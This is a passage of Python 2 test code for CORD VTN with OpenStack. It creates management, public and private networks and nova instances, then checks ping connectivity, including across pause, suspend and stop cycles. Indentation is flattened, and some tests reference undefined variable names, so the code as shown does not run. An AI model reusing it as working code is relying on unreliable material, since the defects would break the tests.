neutron = neutronclient.Client(**neutron_creds)
networks = neutron.list_networks(name=test_net_name)
network_id = self.get_key_value(d=networks, key = 'id')
sub_result = self.neutron_subnet_creation_and_validation(test_net_name,test_sub_net_cidr)
assert_equal(sub_result[0], True)
net_type_post = self.sub_network_type_post_to_onos(test_net_name, test_management_type)
creds = get_nova_credentials()
nova = nova_client.Client('2', **creds)
new_instance_details = self.nova_instance_creation_and_validation(test_net_name,nova,instance_vm_name,image_name,flavor_id)
assert_equal(new_instance_details.status, 'ACTIVE')
compute_details = self.get_compute_nodes()
print new_instance_details.addresses
address = new_instance_details.addresses
print 'Nova instance public ip = %s'%(address[test_net_name][0]['addr'])
time.sleep(60)
status, output = self.nova_instance_tenants_access_check(address[test_net_name][0]['addr'], check_type = "Ping_to_external")
self.nova_instance_deletion(nova, new_instance_details)
time.sleep(5)
self.neutron_network_deletion(test_net_name)
assert_equal(status, False)
def test_cordvtn_creating_public_network_with_two_instances_and_validate_connectivity_between_two(self):
"""
Test Method:
0. Create Test-Net,
1. Create subnetwork whose ip is under public network
3. Do GET Rest API and validate creation of network
4. Create first nova instance under public network
5. Validate first nova instance is created on nova service
6. Create second nova instance under public network
7. Validate second nova instance is created on nova service
8. Now try to ping from one nova instance to other instance, should not success
"""
test_net_name = 'vtn_test_23_net_public'
test_sub_net_cidr = ["public","10.6.1.192/26",'10.6.1.193']
test_management_type = "public"
first_instance_vm_name = 'vtn_test_23_nova_1st_instance_public_net'
second_instance_vm_name = 'vtn_test_23_nova_2nd_instance_public_net'
image_name = "vsg-1.1"
flavor_id = 'm1.small'
result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
neutron_creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**neutron_creds)
networks = neutron.list_networks(name=test_net_name)
network_id = self.get_key_value(d=networks, key = 'id')
sub_result = self.neutron_subnet_creation_and_validation(test_net_name,test_sub_net_cidr)
assert_equal(sub_result[0], True)
net_type_post = self.sub_network_type_post_to_onos(test_net_name, test_management_type)
creds = get_nova_credentials()
nova = nova_client.Client('2', **creds)
first_nova_instance_details = self.nova_instance_creation_and_validation(test_net_name,nova,first_instance_vm_name,image_name,flavor_id)
second_nova_instance_details = self.nova_instance_creation_and_validation(test_net_name,nova,second_instance_vm_name,image_name,flavor_id)
assert_equal(first_instance_details.status, 'ACTIVE')
assert_equal(second_instance_details.status, 'ACTIVE')
compute_details = self.get_compute_nodes()
print 'New nova instance ip addresses are '
print first_nova_instance_details.addresses
print second_nova_instance_details.addresses
address_1st_instance = first_nova_instance_details.addresses
address_2nd_instance = second_nova_instance_details.addresses
print 'Nova 1st instance public ip = %s'%(address_1st_instance[test_net_name][0]['addr'])
print 'Nova 2nd instance public ip = %s'%(address_2nd_instance[test_net_name][0]['addr'])
time.sleep(60)
status, output = self.nova_instance_tenants_access_check(address_1st_instance[test_net_name][0]['addr'],source_tenants_details =address_2nd_instance[test_net_name][0]['addr'], check_type = "Ping_from_source_tenant")
self.nova_instance_deletion(nova, first_nova_instance_details)
self.nova_instance_deletion(nova, second_nova_instance_details)
time.sleep(5)
self.neutron_network_deletion(test_net_name)
assert_equal(status, False)
def test_cordvtn_creating_two_public_network_instances_and_check_connectvity_between_two_networks_via_public_network(self):
"""
Test Method:
0. Create Test-Net,
1. Create subnetwork whose ip is under public network
3. Do GET Rest API and validate creation of network
4. Create new nova instance under public network
5. Validate new nova instance is created on nova service
"""
test_netA_name = 'vtn_test_24_netA_public'
test_sub_netA_cidr = ["public","10.6.1.192/26",'10.6.1.193']
netA_instance_vm_name = 'vtn_test_24_nova_netA_instance_public_net'
test_netB_name = 'vtn_test_24_netB_public'
test_sub_netB_cidr = ["public","10.6.2.192/26",'10.6.2.193']
netB_instance_vm_name = 'vtn_test_24_nova_netB_instance_public_net'
test_management_type = "public"
image_name = "vsg-1.1"
flavor_id = 'm1.small'
netA_instance_vm_details = [netA_instance_vm_name, image_name, flavor_id]
netB_instance_vm_details = [netB_instance_vm_name, image_name, flavor_id]
nova_netA, nova_instance_details_netA = self.create_net_subnet_nova_instance(test_netA_name, test_sub_netA_cidr, netA_instance_vm_details, test_management_type)
nova_netB, nova_instance_details_netB = self.create_net_subnet_nova_instance(test_netB_name, test_sub_netB_cidr, netB_instance_vm_details, test_management_type)
assert_equal(nova_instance_details_netA.status, 'ACTIVE')
assert_equal(nova_instance_details_netB.status, 'ACTIVE')
compute_details = self.get_compute_nodes()
print 'New nova instance ip addresses are '
print nova_instance_details_netA.addresses
print nova_instance_details_netB.addresses
address_1st_instance = nova_instance_details_netA.addresses
address_2nd_instance = nova_instance_details_netB.addresses
print 'Nova 1st instance public ip = %s'%(address_1st_instance[test_netA_name][0]['addr'])
print 'Nova 2nd instance public ip = %s'%(address_2nd_instance[test_netB_name][0]['addr'])
time.sleep(60)
status, output = self.nova_instance_tenants_access_check(address_1st_instance[test_netA_name][0]['addr'],source_tenants_details =address_2nd_instance[test_netB_name][0]['addr'], check_type = "Ping_from_source_tenant")
self.nova_instance_deletion(nova_netA, nova_instance_details_netA)
self.nova_instance_deletion(nova_netB, nova_instance_details_netB)
time.sleep(5)
self.neutron_network_deletion(test_netA_name)
self.neutron_network_deletion(test_netB_name)
assert_equal(status, False)
def test_cordvtn_creating_private_network_instance_and_validate_connectivity_from_host_machine_or_compute_node(self):
"""
Test Method:
0. Create Test-Net,
1. Create subnetwork whose ip is under private network
3. Do GET Rest API and validate creation of network
4. Create new nova instance under private network
5. Validate new nova instance is created on nova service
6. Verify ping is not getting successful from compute node to nova instance which is created in step 4.
"""
test_net_name = 'vtn_test_25_net_private'
test_sub_net_cidr = ["private","10.160.160.192/26",'10.160.160.193']
test_management_type = "private"
instance_vm_name = 'vtn_test_25_nova_instance_private_net'
image_name = "vsg-1.1"
flavor_id = 'm1.small'
result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
neutron_creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**neutron_creds)
networks = neutron.list_networks(name=test_net_name)
network_id = self.get_key_value(d=networks, key = 'id')
sub_result = self.neutron_subnet_creation_and_validation(test_net_name,test_sub_net_cidr)
assert_equal(sub_result[0], True)
net_type_post = self.sub_network_type_post_to_onos(test_net_name, test_management_type)
creds = get_nova_credentials()
nova = nova_client.Client('2', **creds)
new_instance_details = self.nova_instance_creation_and_validation(test_net_name,nova,instance_vm_name,image_name,flavor_id)
assert_equal(new_instance_details.status, 'ACTIVE')
compute_details = self.get_compute_nodes()
print new_instance_details.addresses
address = new_instance_details.addresses
print 'Nova instance private ip = %s'%(address[test_net_name][0]['addr'])
time.sleep(60)
status, output = self.nova_instance_tenants_access_check(address[test_net_name][0]['addr'])
self.nova_instance_deletion(nova, new_instance_details)
time.sleep(5)
self.neutron_network_deletion(test_net_name)
assert_equal(status, False)
def test_cordvtn_creating_private_network_instance_and_validate_connectivity_to_external_network(self):
"""
Test Method:
0. Create Test-Net,
1. Create subnetwork whose ip is under private network
3. Do GET Rest API and validate creation of network
4. Create new nova instance under private network
5. Validate new nova instance is created on nova service
6. Verify ping is getting successful from compute node to nova instance which is created in step 4.
"""
test_net_name = 'vtn_test_26_net_private'
test_sub_net_cidr = ["private","10.160.160.192/26",'10.160.160.193']
test_management_type = "private"
instance_vm_name = 'vtn_test_26_nova_instance_private_net'
image_name = "vsg-1.1"
flavor_id = 'm1.small'
result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
neutron_creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**neutron_creds)
networks = neutron.list_networks(name=test_net_name)
network_id = self.get_key_value(d=networks, key = 'id')
sub_result = self.neutron_subnet_creation_and_validation(test_net_name,test_sub_net_cidr)
assert_equal(sub_result[0], True)
net_type_post = self.sub_network_type_post_to_onos(test_net_name, test_management_type)
creds = get_nova_credentials()
nova = nova_client.Client('2', **creds)
new_instance_details = self.nova_instance_creation_and_validation(test_net_name,nova,instance_vm_name,image_name,flavor_id)
assert_equal(new_instance_details.status, 'ACTIVE')
compute_details = self.get_compute_nodes()
print new_instance_details.addresses
address = new_instance_details.addresses
print 'Nova instance private ip = %s'%(address[test_net_name][0]['addr'])
time.sleep(60)
status, output = self.nova_instance_tenants_access_check(address[test_net_name][0]['addr'], check_type = "Ping_to_external")
self.nova_instance_deletion(nova, new_instance_details)
time.sleep(5)
self.neutron_network_deletion(test_net_name)
assert_equal(status, False)
def test_cordvtn_creating_private_network_with_two_instances_and_check_connectvity_between_two_instances(self):
"""
Test Method:
0. Create Test-Net,
1. Create subnetwork whose ip is under private network
3. Do GET Rest API and validate creation of network
4. Create first nova instance under private network
5. Validate first nova instance is created on nova service
6. Create second nova instance under public network
7. Validate second nova instance is created on nova service
8. Now try to ping from one nova instance to other instance, should not success
"""
test_net_name = 'vtn_test_27_net_private'
test_sub_net_cidr = ["private","10.160.160.192/26",'10.160.160.193']
test_management_type = "private"
first_instance_vm_name = 'vtn_test_27_nova_1st_instance_private_net'
second_instance_vm_name = 'vtn_test_27_nova_2nd_instance_private_net'
image_name = "vsg-1.1"
flavor_id = 'm1.small'
result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
neutron_creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**neutron_creds)
networks = neutron.list_networks(name=test_net_name)
network_id = self.get_key_value(d=networks, key = 'id')
sub_result = self.neutron_subnet_creation_and_validation(test_net_name,test_sub_net_cidr)
assert_equal(sub_result[0], True)
net_type_post = self.sub_network_type_post_to_onos(test_net_name, test_management_type)
creds = get_nova_credentials()
nova = nova_client.Client('2', **creds)
first_nova_instance_details = self.nova_instance_creation_and_validation(test_net_name,nova,first_instance_vm_name,image_name,flavor_id)
second_nova_instance_details = self.nova_instance_creation_and_validation(test_net_name,nova,second_instance_vm_name,image_name,flavor_id)
assert_equal(first_instance_details.status, 'ACTIVE')
assert_equal(second_instance_details.status, 'ACTIVE')
compute_details = self.get_compute_nodes()
print 'New nova instance ip addresses are '
print first_nova_instance_details.addresses
print second_nova_instance_details.addresses
address_1st_instance = first_nova_instance_details.addresses
address_2nd_instance = second_nova_instance_details.addresses
print 'Nova 1st instance private ip = %s'%(address_1st_instance[test_net_name][0]['addr'])
print 'Nova 2nd instance private ip = %s'%(address_2nd_instance[test_net_name][0]['addr'])
time.sleep(60)
status, output = self.nova_instance_tenants_access_check(address_1st_instance[test_net_name][0]['addr'],source_tenants_details =address_2nd_instance[test_net_name][0]['addr'], check_type = "Ping_from_source_tenant")
self.nova_instance_deletion(nova, first_nova_instance_details)
self.nova_instance_deletion(nova, second_nova_instance_details)
time.sleep(5)
self.neutron_network_deletion(test_net_name)
assert_equal(status, False)
def test_cordvtn_creating_two_private_network_instances_and_validate_connectivity_between_two_networks_via_private_network(self):
"""
Test Method:
0. Create Test-Net,
1. Create subnetwork whose ip is under private network
3. Do GET Rest API and validate creation of network
4. Create new nova instance under private network
5. Validate new nova instance is created on nova service
"""
test_netA_name = 'vtn_test_28_netA_private'
test_sub_netA_cidr = ["private","10.160.160.192/26",'10.160.160.193']
netA_instance_vm_name = 'vtn_test_28_nova_netA_instance_private_net'
test_netB_name = 'vtn_test_28_netB_private'
test_sub_netB_cidr = ["private","10.160.161.192/26",'10.160.161.193']
netB_instance_vm_name = 'vtn_test_28_nova_netB_instance_private_net'
test_management_type = "private"
image_name = "vsg-1.1"
flavor_id = 'm1.small'
netA_instance_vm_details = [netA_instance_vm_name, image_name, flavor_id]
netB_instance_vm_details = [netB_instance_vm_name, image_name, flavor_id]
nova_netA, nova_instance_details_netA = self.create_net_subnet_nova_instance(test_netA_name, test_sub_netA_cidr, netA_instance_vm_details, test_management_type)
nova_netB, nova_instance_details_netB = self.create_net_subnet_nova_instance(test_netB_name, test_sub_netB_cidr, netB_instance_vm_details, test_management_type)
assert_equal(nova_instance_details_netA.status, 'ACTIVE')
assert_equal(nova_instance_details_netB.status, 'ACTIVE')
compute_details = self.get_compute_nodes()
print 'New nova instance ip addresses are '
print nova_instance_details_netA.addresses
print nova_instance_details_netB.addresses
address_1st_instance = nova_instance_details_netA.addresses
address_2nd_instance = nova_instance_details_netB.addresses
print 'Nova 1st instance private ip = %s'%(address_1st_instance[test_netA_name][0]['addr'])
print 'Nova 2nd instance private ip = %s'%(address_2nd_instance[test_netB_name][0]['addr'])
time.sleep(60)
status, output = self.nova_instance_tenants_access_check(address_1st_instance[test_netA_name][0]['addr'],source_tenants_details =address_2nd_instance[test_netB_name][0]['addr'], check_type = "Ping_from_source_tenant")
self.nova_instance_deletion(nova_netA, nova_instance_details_netA)
self.nova_instance_deletion(nova_netB, nova_instance_details_netB)
time.sleep(5)
self.neutron_network_deletion(test_netA_name)
self.neutron_network_deletion(test_netB_name)
assert_equal(status, False)
def test_cordvtn_creating_management_and_public_network_instances_and_validate_connectivity_from_host_machine_or_compute_node_and_validate_connectivity_to_internet(self):
"""
Test Method:
0. Create Test-Net,
1. Create subnetwork whose ip is under management network
3. Do GET Rest API and validate creation of network
4. Create new nova instance under management network
5. Validate new nova instance is created on nova service
6. Verify ping is getting successful from compute node to nova instance which is created in step 4.
"""
test_two_networks_name = ['vtn_test_29_net_management','vtn_test_29_net_public']
test_two_sub_networks_cidr = [["management","172.27.0.0/24", "172.27.0.20", "172.27.0.21"], ["public","10.6.1.192/26",'10.6.1.193']]
test_management_type = ["management_local", 'public']
instance_vm_name = 'vtn_test_29_nova_instance_management_net'
# image_name = "vsg-1.1"
image_name = "trusty-server-multi-nic"
flavor_id = 'm1.small'
for test_net_name in test_two_network_name:
result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
neutron_creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**neutron_creds)
#for test_net_name,test_sub_net_cidr in test_two_networks_name test_two_sub_networks_cidr:
for i in range(0,2):
networks = neutron.list_networks(name=test_two_networks_name[i])
network_id = self.get_key_value(d=networks, key = 'id')
sub_result = self.neutron_subnet_creation_and_validation(test_two_networks_name[i],test_two_sub_networks_cidr[i])
assert_equal(sub_result[0], True)
net_type_post = self.sub_network_type_post_to_onos(test_two_networks_name[i], test_management_type[i])
creds = get_nova_credentials()
nova = nova_client.Client('2', **creds)
print nova.security_groups.list()
new_instance_details = self.nova_instance_creation_and_validation(test_two_networks_name,nova,instance_vm_name,image_name,flavor_id)
time.sleep(60)
assert_equal(new_instance_details.status, 'ACTIVE')
compute_details = self.get_compute_nodes()
print new_instance_details.addresses
address = new_instance_details.addresses
print 'Nova instance management ip = %s and public ip %s'%(address[test_two_networks_name[0]][0]['addr'],address[test_two_networks_name[1]][0]['addr'])
print address[test_two_networks_name[0]][0]['addr']
print nova.security_groups.list()
print address[test_two_networks_name[1]][0]['addr']
print nova.security_groups.list()
secgroup = nova.security_groups.find(name="default")
# nova.security_group_rules.create(secgroup.id,ip_protocol="tcp",
#from_port="22",
#to_port="22",
# cidr="0.0.0.0/0",)
# nova.security_group_rules.create(secgroup.id,
# ip_protocol="icmp",
# from_port=-1,
# cidr="0.0.0.0/0",
# to_port=-1)
print nova.security_groups.list()
status_1, output = self.nova_instance_tenants_access_check(address[test_two_networks_name[0]][0]['addr'])
status_2, output = self.nova_instance_tenants_access_check(address[test_two_networks_name[0]][0]['addr'],check_type = "Ping_to_external")
self.nova_instance_deletion(nova, new_instance_details)
time.sleep(3)
self.neutron_network_deletion(test_two_networks_name[0])
self.neutron_network_deletion(test_two_networks_name[1])
assert_equal(status_1, True)
assert_equal(status_2, True)
def test_cordvtn_creating_management_and_public_network_instance_with_and_without_pause_and_validate_connectivity_from_host_machine_or_compute_node_and_validate_connectivity_to_internet(self):
"""
Test Method:
0. Create Test-Net,
1. Create subnetwork whose ip is under management network
3. Do GET Rest API and validate creation of network
4. Create new nova instance under management network
5. Validate new nova instance is created on nova service
6. Verify ping is getting successful from compute node to nova instance which is created in step 4.
7. Now pause the nova instance and check connectivity
8. Now unpause the nova instance and check connectivity
"""
test_two_networks_name = ['vtn_test_30_net_management','vtn_test_30_net_public']
test_two_sub_networks_cidr = [["management","172.27.0.0/24", "172.27.0.20", "172.27.0.21"], ["public","10.6.1.192/26",'10.6.1.193']]
test_management_type = ["management_local", 'public']
instance_vm_name = 'vtn_test_30_nova_instance_management_net'
# image_name = "vsg-1.1"
image_name = "trusty-server-multi-nic"
flavor_id = 'm1.small'
for test_net_name in test_two_networks_name:
result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
neutron_creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**neutron_creds)
#for test_net_name,test_sub_net_cidr in test_two_networks_name test_two_sub_networks_cidr:
for i in range(0,2):
networks = neutron.list_networks(name=test_two_networks_name[i])
network_id = self.get_key_value(d=networks, key = 'id')
sub_result = self.neutron_subnet_creation_and_validation(test_two_networks_name[i],test_two_sub_networks_cidr[i])
assert_equal(sub_result[0], True)
net_type_post = self.sub_network_type_post_to_onos(test_two_networks_name[i], test_management_type[i])
creds = get_nova_credentials()
nova = nova_client.Client('2', **creds)
print nova.security_groups.list()
new_instance_details = self.nova_instance_creation_and_validation(test_two_networks_name,nova,instance_vm_name,image_name,flavor_id)
time.sleep(60)
assert_equal(new_instance_details.status, 'ACTIVE')
compute_details = self.get_compute_nodes()
print new_instance_details.addresses
address = new_instance_details.addresses
print 'Nova instance management ip = %s and public ip %s'%(address[test_two_networks_name[0]][0]['addr'],address[test_two_networks_name[1]][0]['addr'])
print address[test_two_networks_name[0]][0]['addr']
print nova.security_groups.list()
print address[test_two_networks_name[1]][0]['addr']
print nova.security_groups.list()
secgroup = nova.security_groups.find(name="default")
# nova.security_group_rules.create(secgroup.id,ip_protocol="tcp",
#from_port="22",
#to_port="22",
# cidr="0.0.0.0/0",)
# nova.security_group_rules.create(secgroup.id,
# ip_protocol="icmp",
# from_port=-1,
# cidr="0.0.0.0/0",
# to_port=-1)
print nova.security_groups.list()
status_1, output = self.nova_instance_tenants_access_check(address[test_two_networks_name[0]][0]['addr'])
status_2, output = self.nova_instance_tenants_access_check(address[test_two_networks_name[0]][0]['addr'],check_type = "Ping_to_external")
if status_1 is False or status_2 is False:
self.nova_instance_deletion(nova, new_instance_details)
time.sleep(3)
self.neutron_network_deletion(test_two_networks_name[0])
self.neutron_network_deletion(test_two_networks_name[1])
assert_equal(status_1, True)
assert_equal(status_2, True)
new_instance_details.pause()
time.sleep(60)
status_1, output = self.nova_instance_tenants_access_check(address[test_two_networks_name[0]][0]['addr'])
status_2, output = self.nova_instance_tenants_access_check(address[test_two_networks_name[0]][0]['addr'],check_type = "Ping_to_external")
if status_1 is True or status_2 is True:
self.nova_instance_deletion(nova, new_instance_details)
time.sleep(3)
self.neutron_network_deletion(test_two_networks_name[0])
self.neutron_network_deletion(test_two_networks_name[1])
assert_equal(status_1, False)
assert_equal(status_2, False)
new_instance_details.unpause()
print 'Nova instance is paused and unpasued now checking connectivity'
time.sleep(60)
status_1, output = self.nova_instance_tenants_access_check(address[test_two_networks_name[0]][0]['addr'])
status_2, output = self.nova_instance_tenants_access_check(address[test_two_networks_name[0]][0]['addr'],check_type = "Ping_to_external")
self.nova_instance_deletion(nova, new_instance_details)
time.sleep(3)
self.neutron_network_deletion(test_two_networks_name[0])
self.neutron_network_deletion(test_two_networks_name[1])
assert_equal(status_1, True)
assert_equal(status_2, True)
def test_cordvtn_creating_management_and_public_network_instance_doing_suspend_and_resume_validating_connectivity_from_host_machine_or_compute_node_and_validate_connectivity_to_internet(self):
"""
Test Method:
0. Create Test-Net,
1. Create subnetwork whose ip is under management network
3. Do GET Rest API and validate creation of network
4. Create new nova instance under management network
5. Validate new nova instance is created on nova service
6. Verify ping is getting successful from compute node to nova instance which is created in step 4.
7. Now suspend the nova instance and check connectivity
8. Now resume the nova instance and check connectivity
"""
test_two_networks_name = ['vtn_test_31_net_management','vtn_test_31_net_public']
test_two_sub_networks_cidr = [["management","172.27.0.0/24", "172.27.0.20", "172.27.0.21"], ["public","10.6.1.192/26",'10.6.1.193']]
test_management_type = ["management_local", 'public']
instance_vm_name = 'vtn_test_31_nova_instance_management_net'
# image_name = "vsg-1.1"
image_name = "trusty-server-multi-nic"
flavor_id = 'm1.small'
for test_net_name in test_two_networks_name:
result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
neutron_creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**neutron_creds)
#for test_net_name,test_sub_net_cidr in test_two_networks_name test_two_sub_networks_cidr:
for i in range(0,2):
networks = neutron.list_networks(name=test_two_networks_name[i])
network_id = self.get_key_value(d=networks, key = 'id')
sub_result = self.neutron_subnet_creation_and_validation(test_two_networks_name[i],test_two_sub_networks_cidr[i])
assert_equal(sub_result[0], True)
net_type_post = self.sub_network_type_post_to_onos(test_two_networks_name[i], test_management_type[i])
creds = get_nova_credentials()
nova = nova_client.Client('2', **creds)
print nova.security_groups.list()
new_instance_details = self.nova_instance_creation_and_validation(test_two_networks_name,nova,instance_vm_name,image_name,flavor_id)
time.sleep(60)
assert_equal(new_instance_details.status, 'ACTIVE')
compute_details = self.get_compute_nodes()
print new_instance_details.addresses
address = new_instance_details.addresses
print 'Nova instance management ip = %s and public ip %s'%(address[test_two_networks_name[0]][0]['addr'],address[test_two_networks_name[1]][0]['addr'])
print address[test_two_networks_name[0]][0]['addr']
print nova.security_groups.list()
print address[test_two_networks_name[1]][0]['addr']
print nova.security_groups.list()
secgroup = nova.security_groups.find(name="default")
# nova.security_group_rules.create(secgroup.id,ip_protocol="tcp",
#from_port="22",
#to_port="22",
# cidr="0.0.0.0/0",)
# nova.security_group_rules.create(secgroup.id,
# ip_protocol="icmp",
# from_port=-1,
# cidr="0.0.0.0/0",
# to_port=-1)
print nova.security_groups.list()
status_1, output = self.nova_instance_tenants_access_check(address[test_two_networks_name[0]][0]['addr'])
status_2, output = self.nova_instance_tenants_access_check(address[test_two_networks_name[0]][0]['addr'],check_type = "Ping_to_external")
if status_1 is False or status_2 is False:
self.nova_instance_deletion(nova, new_instance_details)
time.sleep(3)
self.neutron_network_deletion(test_two_networks_name[0])
self.neutron_network_deletion(test_two_networks_name[1])
assert_equal(status_1, True)
assert_equal(status_2, True)
new_instance_details.suspend()
time.sleep(60)
status_1, output = self.nova_instance_tenants_access_check(address[test_two_networks_name[0]][0]['addr'])
status_2, output = self.nova_instance_tenants_access_check(address[test_two_networks_name[0]][0]['addr'],check_type = "Ping_to_external")
if status_1 is True or status_2 is True:
self.nova_instance_deletion(nova, new_instance_details)
time.sleep(3)
self.neutron_network_deletion(test_two_networks_name[0])
self.neutron_network_deletion(test_two_networks_name[1])
assert_equal(status_1, False)
assert_equal(status_2, False)
new_instance_details.resume()
print 'Nova instance is suspend and resumed now checking connectivity'
time.sleep(60)
status_1, output = self.nova_instance_tenants_access_check(address[test_two_networks_name[0]][0]['addr'])
status_2, output = self.nova_instance_tenants_access_check(address[test_two_networks_name[0]][0]['addr'],check_type = "Ping_to_external")
self.nova_instance_deletion(nova, new_instance_details)
time.sleep(3)
self.neutron_network_deletion(test_two_networks_name[0])
self.neutron_network_deletion(test_two_networks_name[1])
assert_equal(status_1, True)
assert_equal(status_2, True)
def test_cordvtn_creating_mgmt_and_public_network_instance_with_stopping_and_starting_instances_and_checking_connectvity_from_host_machine_or_compute_node_and_validate_connectivity_to_internet(self):
"""
Test Method:
0. Create Test-Net,
1. Create subnetwork whose ip is under management network
3. Do GET Rest API and validate creation of network
4. Create new nova instance under management network
5. Validate new nova instance is created on nova service
6. Verify ping is getting successful from compute node to nova instance which is created in step 4.
7. Now stop the nova instance and check connectivity
8. Now start the nova instance and check connectivity
"""
test_two_networks_name = ['vtn_test_32_net_management','vtn_test_32_net_public']
test_two_sub_networks_cidr = [["management","172.27.0.0/24", "172.27.0.20", "172.27.0.21"], ["public","10.6.1.192/26",'10.6.1.193']]
test_management_type = ["management_local", 'public']
instance_vm_name = 'vtn_test_32_nova_instance_management_net'
# image_name = "vsg-1.1"
image_name = "trusty-server-multi-nic"
flavor_id = 'm1.small'
for test_net_name in test_two_networks_name:
result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
neutron_creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**neutron_creds)
#for test_net_name,test_sub_net_cidr in test_two_networks_name test_two_sub_networks_cidr:
for i in range(0,2):
networks = neutron.list_networks(name=test_two_networks_name[i])
network_id = self.get_key_value(d=networks, key = 'id')
sub_result = self.neutron_subnet_creation_and_validation(test_two_networks_name[i],test_two_sub_networks_cidr[i])
assert_equal(sub_result[0], True)
net_type_post = self.sub_network_type_post_to_onos(test_two_networks_name[i], test_management_type[i])
creds = get_nova_credentials()
nova = nova_client.Client('2', **creds)
print nova.security_groups.list()
new_instance_details = self.nova_instance_creation_and_validation(test_two_networks_name,nova,instance_vm_name,image_name,flavor_id)
time.sleep(60)
assert_equal(new_instance_details.status, 'ACTIVE')
compute_details = self.get_compute_nodes()
print new_instance_details.addresses
address = new_instance_details.addresses
print 'Nova instance management ip = %s and public ip %s'%(address[test_two_networks_name[0]][0]['addr'],address[test_two_networks_name[1]][0]['addr'])
print address[test_two_networks_name[0]][0]['addr']
print nova.security_groups.list()
print address[test_two_networks_name[1]][0]['addr']
print nova.security_groups.list()
secgroup = nova.security_groups.find(name="default")
# nova.security_group_rules.create(secgroup.id,ip_protocol="tcp",
#from_port="22",
#to_port="22",
# cidr="0.0.0.0/0",)
# nova.security_group_rules.create(secgroup.id,
# ip_protocol="icmp",
# from_port=-1,
# cidr="0.0.0.0/0",
# to_port=-1)
print nova.security_groups.list()
status_1, output = self.nova_instance_tenants_access_check(address[test_two_networks_name[0]][0]['addr'])
status_2, output = self.nova_instance_tenants_access_check(address[test_two_networks_name[0]][0]['addr'],check_type = "Ping_to_external")
if status_1 is False or status_2 is False:
self.nova_instance_deletion(nova, new_instance_details)
time.sleep(3)
self.neutron_network_deletion(test_two_networks_name[0])
self.neutron_network_deletion(test_two_networks_name[1])
assert_equal(status_1, True)
assert_equal(status_2, True)
new_instance_details.stop()
time.sleep(60)
status_1, output = self.nova_instance_tenants_access_check(address[test_two_networks_name[0]][0]['addr'])
status_2, output = self.nova_instance_tenants_access_check(address[test_two_networks_name[0]][0]['addr'],check_type = "Ping_to_external")
if status_1 is True or status_2 is True:
self.nova_instance_deletion(nova, new_instance_details)
time.sleep(3)
self.neutron_network_deletion(test_two_networks_name[0])
self.neutron_network_deletion(test_two_networks_name[1])
assert_equal(status_1, False)
assert_equal(status_2, False)
new_instance_details.start()
print 'Nova instance is stopped and started now checking connectivity'
time.sleep(60)
status_1, output = self.nova_instance_tenants_access_check(address[test_two_networks_name[0]][0]['addr'])
status_2, output = self.nova_instance_tenants_access_check(address[test_two_networks_name[0]][0]['addr'],check_type = "Ping_to_external")
self.nova_instance_deletion(nova, new_instance_details)
time.sleep(3)
self.neutron_network_deletion(test_two_networks_name[0])
self.neutron_network_deletion(test_two_networks_name[1])
assert_equal(status_1, True)
assert_equal(status_2, True)
def test_cordvtn_creating_mgmt_and_private_network_instance_and_validate_connectivity_from_host_machine_or_compute_node_and_validate_connectivity_to_internet(self):
"""
Test Method:
0. Create Test-Net,
1. Create subnetwork whose ip is under management network
3. Do GET Rest API and validate creation of network
4. Create new nova instance under management network
5. Validate new nova instance is created on nova service
6. Verify ping is getting successful from compute node to nova instance which is created in step 4.
"""
test_two_networks_name = ['vtn_test_33_net_management','vtn_test_33_net_private']
test_two_sub_networks_cidr = [["management","172.27.0.0/24", "172.27.0.20", "172.27.0.21"], ["private","10.160.160.192/26",'10.160.160.193']]
test_management_type = ["management_local", 'private']
instance_vm_name = 'vtn_test_33_nova_instance_management_net'
# image_name = "vsg-1.1"
image_name = "trusty-server-multi-nic"
flavor_id = 'm1.small'
for test_net_name in test_two_networks_name:
result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
neutron_creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**neutron_creds)
#for test_net_name,test_sub_net_cidr in test_two_networks_name test_two_sub_networks_cidr:
for i in range(0,2):
networks = neutron.list_networks(name=test_two_networks_name[i])
network_id = self.get_key_value(d=networks, key = 'id')
sub_result = self.neutron_subnet_creation_and_validation(test_two_networks_name[i],test_two_sub_networks_cidr[i])
assert_equal(sub_result[0], True)
net_type_post = self.sub_network_type_post_to_onos(test_two_networks_name[i], test_management_type[i])
creds = get_nova_credentials()
nova = nova_client.Client('2', **creds)
print nova.security_groups.list()
new_instance_details = self.nova_instance_creation_and_validation(test_two_networks_name,nova,instance_vm_name,image_name,flavor_id)
time.sleep(60)
assert_equal(new_instance_details.status, 'ACTIVE')
compute_details = self.get_compute_nodes()
print new_instance_details.addresses
address = new_instance_details.addresses
print 'Nova instance management ip = %s and private ip %s'%(address[test_two_networks_name[0]][0]['addr'],address[test_two_networks_name[1]][0]['addr'])
print address[test_two_networks_name[0]][0]['addr']
print nova.security_groups.list()
print address[test_two_networks_name[1]][0]['addr']
print nova.security_groups.list()
secgroup = nova.security_groups.find(name="default")
# nova.security_group_rules.create(secgroup.id,ip_protocol="tcp",
#from_port="22",
#to_port="22",
# cidr="0.0.0.0/0",)
# nova.security_group_rules.create(secgroup.id,
# ip_protocol="icmp",
# from_port=-1,
# cidr="0.0.0.0/0",
# to_port=-1)
print nova.security_groups.list()
status_1, output = self.nova_instance_tenants_access_check(address[test_two_networks_name[0]][0]['addr'])
status_2, output = self.nova_instance_tenants_access_check(address[test_two_networks_name[0]][0]['addr'],check_type = "Ping_to_external")
self.nova_instance_deletion(nova, new_instance_details)
time.sleep(3)
self.neutron_network_deletion(test_two_networks_name[0])
self.neutron_network_deletion(test_two_networks_name[1])
assert_equal(status_1, True)
assert_equal(status_2, False)
